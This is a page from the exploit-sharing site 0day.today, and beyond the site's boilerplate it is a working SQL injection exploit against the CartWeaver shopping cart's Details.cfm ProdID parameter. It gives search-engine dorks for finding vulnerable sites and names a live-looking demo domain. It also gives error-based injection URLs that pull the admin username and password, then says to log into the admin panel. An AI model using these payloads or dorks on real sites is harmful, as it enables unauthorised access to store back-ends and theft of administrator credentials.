0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CartWeaver (Details.cfm ProdID) Remote SQL Injection Vulnerability
================================================================== CartWeaver (Details.cfm ProdID) Remote SQL Injection Vulnerability ================================================================== product:CartWeaver main site:www.cartweaver.com 1.with CFM CartWeaver: sql injection in: Details.cfm?ProdID=a' demo: http://www.jbracing.co.uk/Details.cfm?ProdID=1' **************** exploit: http://www.xxx.com/Details.cfm?ProdID=[sql query] **************** link admin: http://www.xxx.com/[script path]/cw2/admin/ **************** dork: allinurl:Details.cfm ?ProdID= allinurl:Results.cfm?category= *************** ******************** An example: http://www.xxxxx.co.uk/Details.cfm?ProdID=1' ******************** exploit it: -get username: http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20admin_username%20from%20tbl_adminusers)) Conversion failed when converting the nvarchar value 'jim' to data type int. ==> the username is "jim" -get password: http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20char(97)%2badmin_password%20from%20tbl_adminusers)) Conversion failed when converting the nvarchar value 'a518888' to data type int. The error occurred. on line 116. ==> the password is "51888"( because we added the "a" in the query to get the number that can be converted to integer value) -now, login into admin: http://www.xxxxx.co.uk/cw2/admin/ # 0day.today [2024-11-16] #